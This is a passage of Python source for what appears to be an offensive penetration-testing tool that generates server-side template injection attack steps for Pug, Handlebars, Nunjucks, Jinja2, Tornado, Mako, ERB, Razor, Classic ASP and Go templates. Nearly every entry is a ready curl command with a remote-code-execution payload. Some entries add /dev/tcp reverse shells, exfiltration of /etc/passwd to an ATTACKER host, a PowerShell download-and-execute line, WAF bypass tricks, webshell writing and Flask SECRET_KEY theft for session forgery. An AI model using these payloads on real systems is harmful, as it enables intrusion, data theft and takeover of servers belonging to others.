                            'Enumerate environment: process.env'
                        ],
                        'alternatives': [
                            'Direct require: #{require(\'child_process\').exec(\'whoami\')}',
                            'Inline style: - var x = root.process\\n- x = x.mainModule.require\\n- x = x(\'child_process\')\\n= x.exec(\'id\')',
                            'SpawnSync: #{root.process.mainModule.require(\'child_process\').spawnSync(\'cat\', [\'/etc/passwd\']).stdout}'
                        ],
                        'notes': 'Pug (formerly Jade) uses #{} for expressions. Access global objects via root/global. Escape sandbox via mainModule.constructor._load.'
                    }
                },
                {
                    'id': f'ssti-handlebars-{port}',
                    'name': 'Handlebars SSTI Exploitation',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Handlebars RCE (complex payload - URL encode required)\n# Payload: {{{{#with "s" as |string|}}}}{{{{#with "e"}}}}{{{{#with split as |conslist|}}}}{{{{this.pop}}}}{{{{this.push (lookup string.sub "constructor")}}}}{{{{this.pop}}}}{{{{#with string.split as |codelist|}}}}{{{{this.pop}}}}{{{{this.push "return require(\'child_process\').exec(\'whoami\');"}}}}{{{{this.pop}}}}{{{{#each conslist}}}}{{{{#with (string.sub.apply 0 codelist)}}}}{{{{this}}}}{{{{/with}}}}{{{{/each}}}}{{{{/with}}}}{{{{/with}}}}{{{{/with}}}}{{{{/with}}}}\ncurl "http://{target}:{port}/page" --data-urlencode "param=URL_ENCODE_ABOVE"',
                        'description': 'Exploit Handlebars prototype pollution to achieve RCE',
                        'tags': ['OSCP:MEDIUM', 'EXPLOIT', 'SSTI', 'RCE', 'NODEJS'],
                        'flag_explanations': {
                            '#with': 'Handlebars block helper for context manipulation',
                            'string.sub': 'String.prototype.substring method',
                            'lookup': 'Handlebars lookup helper to access properties',
                            'this.push/this.pop': 'Array manipulation for prototype pollution',
                            'string.sub.apply': 'Call substring as Function constructor'
                        },
                        'success_indicators': [
                            'Command executes',
                            'Prototype pollution successful'
                        ],
                        'failure_indicators': [
                            'Handlebars 4.6.0+ (patched)',
                            'Complex payload blocked',
                            'Syntax error'
                        ],
                        'next_steps': [
                            'Simplify payload for testing',
                            'Try path traversal: {"profile":{"layout": "../../../etc/passwd"}}',
                            'Check Handlebars version for known CVEs'
                        ],
                        'alternatives': [
                            'Path traversal (simpler): POST {"profile":{"layout": "./../routes/index.js"}}',
                            'If eval available: {{this.constructor.constructor("return process")().exit()}}',
                            'Try built-in helpers abuse: {{lookup (lookup this \'constructor\') \'constructor\')}}'
                        ],
                        'notes': 'Handlebars RCE via prototype pollution (CVE-2019-19919, patched in 4.6.0). Complex payload - test incrementally. Path traversal often easier initial vector. Source: http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html'
                    }
                },
                {
                    'id': f'ssti-nunjucks-{port}',
                    'name': 'Nunjucks SSTI Exploitation',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Nunjucks RCE\ncurl "http://{target}:{port}/page?param={{{{{{{{range.constructor(\'return global.process.mainModule.require(\\\'child_process\\\').execSync(\\\'id\\\')\')()}}}}}}}}"',
                        'description': 'Execute commands in Nunjucks via Function constructor',
                        'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'NODEJS'],
                        'flag_explanations': {
                            'range.constructor': 'Access Function constructor via any object',
                            '"return ..."': 'JavaScript code to execute via Function constructor',
                            'global.process.mainModule.require': 'Access require() function',
                            'child_process.execSync': 'Synchronous command execution (output returned)'
                        },
                        'success_indicators': [
                            'Command output in response',
                            'uid=, gid= visible'
                        ],
                        'failure_indicators': [
                            'Nunjucks sandbox enabled',
                            'Function constructor blocked',
                            'require() not accessible'
                        ],
                        'next_steps': [
                            'Reverse shell: execSync("bash -c \'bash -i >& /dev/tcp/IP/PORT 0>&1\'")',
                            'Read files: require(\'fs\').readFileSync(\'/etc/passwd\')',
                            'Enumerate: global.process.env'
                        ],
                        'alternatives': [
                            'Async exec: {{range.constructor("return global.process.mainModule.require(\'child_process\').exec(\'curl http://ATTACKER/?\'+require(\'fs\').readFileSync(\'/etc/passwd\'))")()}}',
                            'Direct eval: {{range.constructor("return eval(\'process.exit()\')")()}}',
                            'Alternative path: {{"".__proto__.constructor.constructor("return process")()}}',
                        ],
                        'notes': 'Nunjucks sandbox escape via Function constructor. Use execSync for synchronous output. Source: http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine'
                    }
                }
            ]
        }

    def _create_python_phase(self, target: str, port: int) -> Dict[str, Any]:
        """Python template engine exploitation (advanced techniques)"""
        return {
            'id': f'ssti-python-{port}',
            'name': 'Python Template Engines (Advanced)',
            'type': 'parent',
            'children': [
                {
                    'id': f'jinja2-advanced-{port}',
                    'name': 'Jinja2 Advanced RCE',
                    'type': 'parent',
                    'children': [
                        {
                            'id': f'jinja2-rce-no-builtins-{port}',
                            'name': 'Jinja2 RCE Without __builtins__',
                            'type': 'command',
                            'metadata': {
                                'command': f'# Jinja2 RCE via cycler (no __builtins__ needed)\ncurl "http://{target}:{port}/page?param={{{{{{{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(\'id\').read() }}}}}}}}"',
                                'description': 'Execute commands in Jinja2 without accessing __builtins__ (bypass restrictions)',
                                'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'PYTHON', 'BYPASS'],
                                'flag_explanations': {
                                    'self._TemplateReference__context': 'Access template context via name mangling',
                                    'cycler.__init__.__globals__': 'Access global namespace from cycler object',
                                    'os.popen': 'OS module accessible from cycler globals',
                                    '.read()': 'Read command output'
                                },
                                'success_indicators': [
                                    'Command output in response',
                                    'uid=, gid= visible',
                                    'Bypassed __builtins__ restriction'
                                ],
                                'failure_indicators': [
                                    'cycler not available',
                                    'os module not in globals',
                                    'Template context restricted'
                                ],
                                'next_steps': [
                                    'Read sensitive files',
                                    'Establish reverse shell',
                                    'Extract Flask SECRET_KEY'
                                ],
                                'alternatives': [
                                    'joiner variant: {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen(\'id\').read() }}',
                                    'namespace variant: {{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen(\'id\').read() }}',
                                    'Shortest form: {{ cycler.__init__.__globals__.os.popen(\'id\').read() }}',
                                    'Without self: {{ namespace.__init__.__globals__.os.popen(\'id\').read() }}'
                                ],
                                'notes': 'RCE without __builtins__ access - uses template built-in objects (cycler, joiner, namespace). More reliable than traditional __subclasses__() method. Source: https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/'
                            }
                        },
                        {
                            'id': f'jinja2-filter-bypass-{port}',
                            'name': 'Jinja2 WAF Bypass Techniques',
                            'type': 'manual',
                            'metadata': {
                                'description': 'Advanced filter bypass techniques for Jinja2 SSTI',
                                'tags': ['OSCP:HIGH', 'BYPASS', 'SSTI', 'WAF'],
                                'alternatives': [
                                    '1. Hex encoding: request[\'\\x5f\\x5fclass\\x5f\\x5f\']',
                                    '2. Attr filter: request|attr("__class__")',
                                    '3. Request args: request|attr(request.args.c) (send ?c=__class__)',
                                    '4. Join trick: request|attr(["_"*2, "class", "_"*2]|join)',
                                    '5. String format: request|attr(request.args.f|format(request.args.a,request.args.a)) (send ?f=%s%sclass%s%s&a=_)',
                                    '6. With block: {% with a = request["application"]["\\x5f\\x5fglobals\\x5f\\x5f"] %} {{ a }} {% endwith %}',
                                    '7. No brackets: {%with a=request|attr("application")|attr("\\x5f\\x5fglobals\\x5f\\x5f")%}{%print(a)%}{%endwith%}'
                                ],
                                'notes': 'Multiple bypass techniques for blocked chars: dots, brackets, quotes, underscores. Combine techniques for maximum evasion. Test incrementally to identify blocked chars. Use Fenjing tool for automated bypass fuzzing: https://github.com/Marven11/Fenjing'
                            }
                        },
                        {
                            'id': f'jinja2-config-access-{port}',
                            'name': 'Jinja2 Config & Environment Access',
                            'type': 'command',
                            'metadata': {
                                'command': f'# Extract Flask config\ncurl "http://{target}:{port}/page?param={{{{ config }}}}"',
                                'description': 'Access Flask application config to extract SECRET_KEY and sensitive data',
                                'tags': ['OSCP:HIGH', 'ENUM', 'SSTI', 'PYTHON'],
                                'flag_explanations': {
                                    'config': 'Flask config object (always accessible in templates)',
                                    'config.items()': 'Iterate over config key-value pairs',
                                    'SECRET_KEY': 'Flask session signing key (critical for session forging)'
                                },
                                'success_indicators': [
                                    'SECRET_KEY visible',
                                    'Database credentials exposed',
                                    'Config dict rendered'
                                ],
                                'failure_indicators': [
                                    'Config access restricted',
                                    'Empty config object',
                                    'Template rendering error'
                                ],
                                'next_steps': [
                                    'Use SECRET_KEY to forge admin sessions',
                                    'Extract DB credentials: config[\'SQLALCHEMY_DATABASE_URI\']',
                                    'Read DEBUG mode: config[\'DEBUG\']'
                                ],
                                'alternatives': [
                                    'Iterate: {% for key, value in config.items() %} {{ key }}: {{ value }} {% endfor %}',
                                    'Specific key: {{ config[\'SECRET_KEY\'] }}',
                                    'Via request: {{ request.application.config }}',
                                    'Settings: {{ settings }} (Django equivalent)'
                                ],
                                'notes': 'Flask config object exposes sensitive application data. SECRET_KEY allows session cookie forgery. Also contains DB URIs, API keys, debug flags. Critical for post-exploitation.'
                            }
                        }
                    ]
                },
                {
                    'id': f'tornado-ssti-{port}',
                    'name': 'Tornado SSTI Exploitation',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Tornado RCE (URL encoded: {{% import os %}})\ncurl "http://{target}:{port}/page?param=%7B%25%20import%20os%20%25%7D{{{{{{{{os.system(\'id\')}}}}}}}}"',
                        'description': 'Execute commands in Tornado templates via Python import',
                        'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'PYTHON'],
                        'flag_explanations': {
                            '{% import os %}': 'Import Python os module in Tornado template',
                            '{{os.system(\'id\')}}': 'Execute OS command via os.system()',
                            '{% raw %}...{% endraw %}': 'Raw block to prevent template processing'
                        },
                        'success_indicators': [
                            'Command executes',
                            'Exit code returned (0 = success)'
                        ],
                        'failure_indicators': [
                            'Import restricted',
                            'os module blocked',
                            'Sandbox enabled'
                        ],
                        'next_steps': [
                            'Capture output: os.popen(\'id\').read()',
                            'Reverse shell',
                            'Read files: open(\'/etc/passwd\').read()'
                        ],
                        'alternatives': [
                            'With output: {% import os %}{{os.popen(\'whoami\').read()}}',
                            'subprocess: {% import subprocess %}{{subprocess.check_output(\'id\', shell=True)}}',
                            'eval: {{eval("__import__(\'os\').system(\'id\')")}}',
                        ],
                        'notes': 'Tornado allows Python imports in templates. Use os.popen() for output capture. Source: https://ajinabraham.com/blog/server-side-template-injection-in-tornado'
                    }
                },
                {
                    'id': f'mako-ssti-{port}',
                    'name': 'Mako SSTI Exploitation',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Mako RCE\ncurl "http://{target}:{port}/page?param=<%25%0Aimport+os%0Ax%3dos.popen(\'id\').read()%0A%25>${{{{{{x}}}}}}"',
                        'description': 'Execute commands in Mako templates via Python code blocks',
                        'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'PYTHON'],
                        'flag_explanations': {
                            '<%...%>': 'Mako Python code block',
                            'import os': 'Import os module',
                            'x=os.popen(\'id\').read()': 'Execute command and capture output',
                            '${x}': 'Output variable x to template'
                        },
                        'success_indicators': [
                            'Command output visible',
                            'Python code executed'
                        ],
                        'failure_indicators': [
                            'Mako code blocks disabled',
                            'os module restricted',
                            'Syntax error'
                        ],
                        'next_steps': [
                            'Reverse shell',
                            'Read files: open(\'/etc/passwd\').read()',
                            'Enumerate environment'
                        ],
                        'alternatives': [
                            'Direct execution: <%import os; os.system(\'id\')%>',
                            'File read: <%x=open(\'/etc/passwd\').read()%>${x}',
                            'subprocess: <%import subprocess; x=subprocess.check_output(\'id\', shell=True)%>${x}'
                        ],
                        'notes': 'Mako allows arbitrary Python code in <% %> blocks. Very powerful for RCE. Used in Pylons/Pyramid frameworks.'
                    }
                }
            ]
        }

    def _create_other_engines_phase(self, target: str, port: int) -> Dict[str, Any]:
        """Other template engines (Ruby, .NET, Go, etc.)"""
        return {
            'id': f'ssti-other-{port}',
            'name': 'Other Template Engines',
            'type': 'parent',
            'children': [
                {
                    'id': f'erb-ssti-{port}',
                    'name': 'ERB (Ruby) SSTI',
                    'type': 'command',
                    'metadata': {
                        'command': f'# ERB RCE\ncurl "http://{target}:{port}/page?param=<%25%3d+system(\'id\')+ %25>"',
                        'description': 'Execute commands in ERB (Ruby) templates',
                        'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'RUBY'],
                        'flag_explanations': {
                            '<%= ... %>': 'ERB expression tag (output result)',
                            'system(\'id\')': 'Ruby system() for command execution',
                            '<% ... %>': 'ERB code tag (no output)'
                        },
                        'success_indicators': [
                            'Command output in response',
                            'uid=, gid= visible'
                        ],
                        'failure_indicators': [
                            'ERB sandbox enabled',
                            'system() blocked',
                            'Rails safe mode'
                        ],
                        'next_steps': [
                            'Read files: <%= File.open(\'/etc/passwd\').read %>',
                            'Reverse shell: <%= `bash -c "bash -i ..."`%>',
                            'Directory listing: <%= Dir.entries(\'/\') %>'
                        ],
                        'alternatives': [
                            'Backticks: <%= `id` %>',
                            'IO.popen: <%= IO.popen(\'id\').readlines() %>',
                            'Open3: <% require \'open3\' %><% @a,@b,@c,@d=Open3.popen3(\'id\') %><%= @b.readline()%>',
                            'exec: <%= exec(\'id\') %>'
                        ],
                        'notes': 'ERB (Embedded Ruby) used in Rails. Multiple command execution methods. <%= outputs result, <% executes without output.'
                    }
                },
                {
                    'id': f'razor-ssti-{port}',
                    'name': 'Razor (.NET) SSTI',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Razor (.NET) RCE\ncurl "http://{target}:{port}/page?param=@System.Diagnostics.Process.Start(\\"cmd.exe\\",\\"/c+whoami\\")"',
                        'description': 'Execute commands in ASP.NET Razor templates',
                        'tags': ['OSCP:HIGH', 'EXPLOIT', 'SSTI', 'RCE', 'DOTNET'],
                        'flag_explanations': {
                            '@': 'Razor code nugget (inline C# code)',
                            'System.Diagnostics.Process.Start': '.NET method to start processes',
                            'cmd.exe': 'Windows command prompt',
                            '/c': 'Execute command and exit'
                        },
                        'success_indicators': [
                            'Command executes (check out-of-band)',
                            'Process object returned'
                        ],
                        'failure_indicators': [
                            'Razor sandbox enabled',
                            'Process.Start blocked',
                            'Partial trust environment'
                        ],
                        'next_steps': [
                            'Capture output: @(new System.IO.StreamReader(Process.Start(new ProcessStartInfo("cmd.exe", "/c whoami") { RedirectStandardOutput = true }).StandardOutput).ReadToEnd())',
                            'PowerShell download-execute',
                            'Write webshell'
                        ],
                        'alternatives': [
                            'Simple: @(2+2) (test for 4)',
                            'Code block: @{ var output = System.Diagnostics.Process.Start(...); }',
                            'PowerShell: @System.Diagnostics.Process.Start("powershell.exe", "-enc BASE64_PAYLOAD")',
                            'Write file: @System.IO.File.WriteAllText("C:\\\\temp\\\\shell.aspx", "<%@ Page Language=\\"C#\\" ...%>")'
                        ],
                        'notes': 'Razor allows inline C# via @. Use System.Diagnostics.Process.Start for RCE. Vulnerable webapp example: https://github.com/cnotin/RazorVulnerableApp'
                    }
                },
                {
                    'id': f'asp-ssti-{port}',
                    'name': 'ASP SSTI (Classic ASP)',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Classic ASP RCE\ncurl "http://{target}:{port}/page.asp?param=<%25%3d+CreateObject(%22Wscript.Shell%22).exec(%22powershell+IEX(New-Object+Net.WebClient).downloadString(\'http://ATTACKER/shell.ps1\')%22)+%25>"',
                        'description': 'Execute commands in Classic ASP templates via WScript.Shell',
                        'tags': ['OSCP:MEDIUM', 'EXPLOIT', 'SSTI', 'RCE', 'ASP'],
                        'flag_explanations': {
                            '<%= ... %>': 'ASP expression tag',
                            'CreateObject("Wscript.Shell")': 'Create Windows Script Host shell object',
                            '.exec()': 'Execute command',
                            'powershell IEX': 'PowerShell Invoke-Expression (download and execute)'
                        },
                        'success_indicators': [
                            'PowerShell download executes',
                            'Reverse shell established',
                            'Command runs'
                        ],
                        'failure_indicators': [
                            'CreateObject blocked',
                            'PowerShell restricted',
                            'Network egress blocked'
                        ],
                        'next_steps': [
                            'Write ASP webshell',
                            'Read files via FSO',
                            'Enumerate local system'
                        ],
                        'alternatives': [
                            'Simpler: <%= CreateObject("Wscript.Shell").exec("calc.exe") %>',
                            'FSO read: <%= CreateObject("Scripting.FileSystemObject").OpenTextFile("C:\\\\boot.ini").ReadAll() %>',
                            'ADODB Stream for binary reads'
                        ],
                        'notes': 'Classic ASP uses VBScript. CreateObject accesses Windows COM objects. WScript.Shell for commands, Scripting.FileSystemObject for file operations. Legacy but still found on old IIS servers.'
                    }
                },
                {
                    'id': f'go-ssti-{port}',
                    'name': 'Go Template SSTI',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Go template RCE (if custom methods available)\ncurl "http://{target}:{port}/page?param={{{{ . }}}}"\n# If Person object with Secret method:\ncurl "http://{target}:{port}/page?param={{{{ .Secret+\\"ls\\" }}}}"',
                        'description': 'Exploit Go templates by calling object methods (requires source code review)',
                        'tags': ['OSCP:LOW', 'EXPLOIT', 'SSTI', 'GO'],
                        'flag_explanations': {
                            '{{ . }}': 'Current context/object in Go templates',
                            '{{ .MethodName }}': 'Call method on object',
                            '{{ printf "%s" "test" }}': 'Built-in formatting function'
                        },
                        'success_indicators': [
                            'Object data exposed',
                            'Method execution confirmed',
                            'RCE via custom method'
                        ],
                        'failure_indicators': [
                            'No exploitable methods',
                            'html/template (auto-escapes)',
                            'Limited context'
                        ],
                        'next_steps': [
                            'Review source code for exploitable methods',
                            'Test XSS: {{define "T1"}}alert(1){{end}} {{template "T1"}}',
                            'Enumerate context: {{ . }}'
                        ],
                        'alternatives': [
                            'XSS (text/template): {{"<script>alert(1)</script>"}}',
                            'Format string: {{printf "%s" "test"}}',
                            'Call method: {{ .Secret "command" }} (if Secret method exists)'
                        ],
                        'notes': 'Go templates limited for RCE. text/template allows XSS, html/template escapes. RCE requires custom methods on passed objects (e.g., Person.Secret() that calls exec.Command). Source review essential. See: https://blog.takemyhand.xyz/2020/06/ssti-breaking-gos-template-engine-to'
                    }
                }
            ]
        }

    def _create_tools_phase(self, target: str, port: int) -> Dict[str, Any]:
        """Automated SSTI detection and exploitation tools"""
        return {
            'id': f'ssti-tools-{port}',
            'name': 'Automated SSTI Tools',
            'type': 'parent',
            'children': [
                {
                    'id': f'tinja-scan-{port}',
                    'name': 'TInjA - SSTI Scanner',
                    'type': 'command',
                    'metadata': {
                        'command': f'# TInjA scanner (polyglot-based detection)\ntinja url -u "http://{target}:{port}/?param=test" -H "Authorization: Bearer TOKEN"',
                        'description': 'Scan for SSTI vulnerabilities using novel polyglot payloads',
                        'tags': ['OSCP:MEDIUM', 'AUTOMATED', 'SSTI', 'SCANNER'],
                        'flag_explanations': {
                            'url': 'URL scanning mode',
                            '-u': 'Target URL with parameter',
                            '-H': 'Custom HTTP header',
                            'polyglot': 'Multi-engine payload that works across template engines'
                        },
                        'success_indicators': [
                            'SSTI vulnerability detected',
                            'Template engine identified',
                            'Exploitable parameter found'
                        ],
                        'failure_indicators': [
                            'No vulnerabilities found',
                            'WAF blocking scanner',
                            'False negatives'
                        ],
                        'next_steps': [
                            'Manual exploitation with identified engine',
                            'Test with sstimap for RCE',
                            'Fuzz with custom payloads'
                        ],
                        'alternatives': [
                            'POST data: tinja url -u "http://{target}:{port}/" -d "username=test"',
                            'With cookies: tinja url -u "http://{target}:{port}/" -c "PHPSESSID=ABC123"',
                            'Burp request file: tinja request -r request.txt'
                        ],
                        'notes': 'TInjA uses polyglot payloads for multi-engine detection. Fast and low false-positive rate. Install: git clone https://github.com/Hackmanit/TInjA && cd TInjA && pip3 install -e .'
                    }
                },
                {
                    'id': f'sstimap-{port}',
                    'name': 'SSTImap - Exploitation Tool',
                    'type': 'command',
                    'metadata': {
                        'command': f'# SSTImap automated exploitation\npython3 sstimap.py -u "http://{target}:{port}/page?name=test" -s',
                        'description': 'Automatically detect and exploit SSTI to achieve RCE',
                        'tags': ['OSCP:HIGH', 'AUTOMATED', 'SSTI', 'EXPLOIT'],
                        'flag_explanations': {
                            '-u': 'Target URL with parameter to test',
                            '-s': 'Smart mode - automatically choose best exploitation technique',
                            '-i': 'Interactive mode - get shell',
                            '-l': 'Level of checks (1-5, default 1)'
                        },
                        'success_indicators': [
                            'Template engine identified',
                            'RCE achieved',
                            'Interactive shell obtained'
                        ],
                        'failure_indicators': [
                            'Detection failed',
                            'Exploitation blocked',
                            'Unsupported template engine'
                        ],
                        'next_steps': [
                            'Interactive mode: -i',
                            'Execute single command: -e "whoami"',
                            'Upload/download files'
                        ],
                        'alternatives': [
                            'Interactive shell: sstimap.py -u URL -i -l 5',
                            'Crawl site: sstimap.py -u "http://{target}:{port}/" --crawl 5 --forms',
                            'Execute command: sstimap.py -u URL -e "cat /etc/passwd"'
                        ],
                        'notes': 'SSTImap supports Jinja2, Mako, Twig, Freemarker, Velocity, and more. Interactive mode provides pseudo-shell. Install: git clone https://github.com/vladko312/sstimap && cd sstimap && pip3 install -r requirements.txt'
                    }
                },
                {
                    'id': f'tplmap-{port}',
                    'name': 'Tplmap - Template Engine Exploitation',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Tplmap (older but still useful)\npython2.7 tplmap.py -u "http://{target}:{port}/page?name=*" --os-shell',
                        'description': 'Exploit SSTI vulnerabilities and get OS shell (supports many engines)',
                        'tags': ['OSCP:MEDIUM', 'AUTOMATED', 'SSTI', 'EXPLOIT'],
                        'flag_explanations': {
                            '-u': 'Target URL (* marks injection point)',
                            '--os-shell': 'Attempt to get interactive OS shell',
                            '-e': 'Specify template engine (e.g., jade, twig)',
                            '--level': 'Testing level (1-5)'
                        },
                        'success_indicators': [
                            'Template engine detected',
                            'OS shell obtained',
                            'Commands executing'
                        ],
                        'failure_indicators': [
                            'Python 2.7 compatibility issues',
                            'Unsupported engine',
                            'Exploitation failed'
                        ],
                        'next_steps': [
                            'File upload/download',
                            'Bind shell',
                            'Manual exploitation if tplmap fails'
                        ],
                        'alternatives': [
                            'Specify engine: tplmap.py -u URL -e jade --os-shell',
                            'Multiple injection points: tplmap.py -u "http://{target}:{port}/ti?user=*&comment=*"',
                            'High level: tplmap.py -u URL --level 5'
                        ],
                        'notes': 'Tplmap is older (Python 2.7) but supports many engines. Use sstimap for Python 3. Mark injection point with asterisk (*). Install: git clone https://github.com/epinna/tplmap'
                    }
                },
                {
                    'id': f'fenjing-{port}',
                    'name': 'Fenjing - WAF Bypass Fuzzer',
                    'type': 'command',
                    'metadata': {
                        'command': f'# Fenjing WAF bypass and exploitation\npython -m fenjing crack --url "http://{target}:{port}/page" --method GET --inputs name',
                        'description': 'Fuzz for SSTI bypasses and provide interactive shell (Python-focused)',
                        'tags': ['OSCP:MEDIUM', 'BYPASS', 'SSTI', 'FUZZER'],
                        'flag_explanations': {
                            'crack': 'Attack specific form',
                            '--url': 'Target URL',
                            '--method': 'HTTP method (GET/POST)',
                            '--inputs': 'Form input names to fuzz',
                            'scan': 'Scan entire website for forms'
                        },
                        'success_indicators': [
                            'Bypass discovered',
                            'Interactive shell provided',
                            'WAF evaded'
                        ],
                        'failure_indicators': [
                            'All bypasses blocked',
                            'Non-Python template engine',
                            'No vulnerable inputs'
                        ],
                        'next_steps': [
                            'Use provided simulated terminal',
                            'Execute discovered bypass manually',
                            'Refine payload for specific WAF'
                        ],
                        'alternatives': [
                            'Scan site: python -m fenjing scan --url "http://{target}:{port}/"',
                            'Path injection: python -m fenjing crack-path --url "http://{target}:{port}/hello/"',
                            'Request file: python -m fenjing crack-request -r request.txt'
                        ],
                        'notes': 'Fenjing specializes in Python template engines (Jinja2, Mako, Tornado) and WAF bypass fuzzing. Provides simulated terminal on success. CTF-focused but useful for WAF evasion research. Install: pip3 install fenjing'
                    }
                }
            ]
        }

    def detect_from_finding(self, finding: Dict[str, Any], profile: Optional['TargetProfile'] = None) -> float:
        """Activate on SSTI detection"""
        from ..core.constants import FindingTypes
        logger = logging.getLogger(__name__)

        finding_type = finding.get('type', '').lower()
        description = finding.get('description', '').lower()

        # Perfect match
        if finding_type == FindingTypes.SSTI_FOUND:
            logger.info("SSTI attacks activating: SSTI vulnerability detected")
            return 100

        # High - SSTI indicators
        ssti_indicators = ['ssti', 'template injection', 'jinja', 'jinja2', 'twig',
                          'freemarker', 'velocity', 'thymeleaf', 'mustache', 'handlebars']
        if any(ind in description for ind in ssti_indicators):
            logger.info("SSTI attacks activating: Template engine/SSTI detected")
            return 90

        # Medium - Template engine context
        if 'template' in description and any(kw in description for kw in ['render', 'evaluate', 'compile']):
            logger.info("SSTI attacks activating: Template processing detected")
            return 75

        return 0

